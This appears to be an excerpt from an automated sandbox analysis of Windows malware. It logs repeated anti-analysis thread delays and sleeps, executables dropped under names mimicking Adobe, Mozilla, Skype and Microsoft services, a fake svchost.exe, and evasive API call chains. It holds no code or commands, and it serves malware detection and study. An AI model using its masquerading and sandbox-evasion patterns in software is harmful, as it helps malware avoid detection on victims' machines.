Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558657
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558266
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558016
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 557837
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 557608
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 557391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 557141
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 556907
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 556500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 556297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 556094
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 555797
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 555563
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 555364
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 555172
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 554974
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 554789
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 554610
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 554382
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 553953
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 553691
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 553422
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 553199
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 552938
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 552735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 552531
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 552282
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 551735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 551485
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 551281
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 551063
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 550858
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 550703
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 550484
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 550172
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 549969
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 549610
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 549141
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 548906
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 548703
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 548469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 548266
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 547938
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 547735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 547422
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 546906
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 546594
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 546266
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 545969
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 545500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 545188
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 544500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 544198
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 543828
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\KMSAuto\accc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 599719
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 599265
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 598734
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 598255
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 597590
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 597170
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 596906
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595875
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595490
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595047
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 594633
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 594250
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 593875
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 593594
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 593359
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 593047
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 592797
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 592562
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 592344
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 592140
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 591797
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 591344
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 591062
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 590828
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 590640
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 590406
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 590140
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 589922
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 589724
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 589599
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 589156
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588984
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588765
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588578
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588390
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588226
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588062
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 587873
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 587640
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 587422
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 587265
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 586890
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 586594
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 586375
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 586109
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 585781
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 585422
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 585156
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 584812
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 584276
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583949
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583728
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583515
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583234
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583062
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 582812
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 582578
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 582297
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581890
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581703
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581469
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581312
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581094
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580906
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580716
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580531
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580312
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580015
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 579609
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 579437
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 579276
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 579078
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578931
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578703
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578538
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578328
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578125
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577953
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577791
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577500
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577187
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577015
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576856
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576665
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576515
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576297
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576015
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 575844
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 575656
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 575523
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 575359
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 574969
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 574750
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 574453
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 574181
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 573781
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 573469
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 573219
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 572828
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 572390
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 572203
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 572001
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 571797
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 571500
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 571297
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 571047
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 570859
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 570713
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 570539
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 570156
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569982
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569812
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569646
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569429
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569234
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 568890
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 568422
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 568156
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 567687
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 567453
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 567265
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 567058
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 566874
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 566640
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 566406
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 566256
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 566062
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 565875
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 565719
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 565565
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 565418
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 733	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 373	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Window / User API: threadDelayed 450
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Window / User API: threadDelayed 767
Source: C:\Users\user\AppData\Roaming\svchost.exe	Window / User API: threadDelayed 1947
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Window / User API: threadDelayed 486

Source: C:\Windows\System32\relog.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\com.adobe.dunamis\Service_com.adobe.dunamis.exe	Jump to dropped file
Source: C:\Windows\System32\relog.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zbi[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Skype\Service_Skype.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Service_Microsoft.exe	Jump to dropped file

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Evaded block: after key decision	graph_0-14483
Source: C:\Windows\System32\relog.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Evaded block: after key decision
Source: C:\Windows\System32\relog.exe	Evaded block: after key decision
Source: C:\Windows\System32\relog.exe	Evaded block: after key decision
Source: C:\Windows\System32\relog.exe	Evaded block: after key decision
Source: C:\Windows\System32\relog.exe	Evaded block: after key decision

Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\System32\relog.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_0-14162

Source: C:\Windows\System32\relog.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-14424
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\explorer.exe	API coverage: 8.5 %
Source: C:\Windows\System32\relog.exe	API coverage: 3.3 %
Source: C:\Windows\System32\relog.exe	API coverage: 3.3 %
Source: C:\Windows\System32\relog.exe	API coverage: 3.3 %

Source: C:\Windows\explorer.exe TID: 1432	Thread sleep time: -373000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3748	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6216	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe TID: 7220	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe TID: 6900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -598929s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -598718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -598515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -598312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -598140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -597953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -597621s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -597421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -596757s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -596578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -596046s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -99445s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -98954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -98418s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -98090s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -97869s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -593578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -593296s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -593125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -99718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -99453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -99093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -98906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -98718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -98515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -98343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -591156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -590968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -590778s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -590593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -590375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -590078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -589656s >= -30000s
